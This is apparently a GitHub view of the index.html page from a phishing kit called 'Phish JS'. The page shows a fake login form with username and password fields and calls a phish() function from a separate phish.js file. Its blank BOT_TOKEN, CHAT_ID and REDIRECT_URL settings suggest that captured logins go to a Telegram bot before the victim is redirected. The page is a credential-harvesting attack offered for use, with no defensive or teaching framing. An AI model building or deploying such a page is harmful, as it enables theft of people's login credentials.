-
Notifications
You must be signed in to change notification settings - Fork 19
/
index.html
28 lines (24 loc) · 827 Bytes
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Phish JS</title>
</head>
<body>
<input type="text" id='username' placeholder="Login">
<input type="password" id='password' placeholder="Password">
<button type="button" id="submit-button">Login</button>
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js"
integrity="sha256-pasqAKBDmFT4eHoN2ndd6lN370kFiGUFyTiUHWhU7k8=" crossorigin="anonymous"></script>
<script src="phish.js"></script>
<script>
$(document).ready(function () {
const BOT_TOKEN = '',
CHAT_ID = '',
REDIRECT_URL = ''
phish(BOT_TOKEN, CHAT_ID, REDIRECT_URL);
});
</script>
</body>
</html>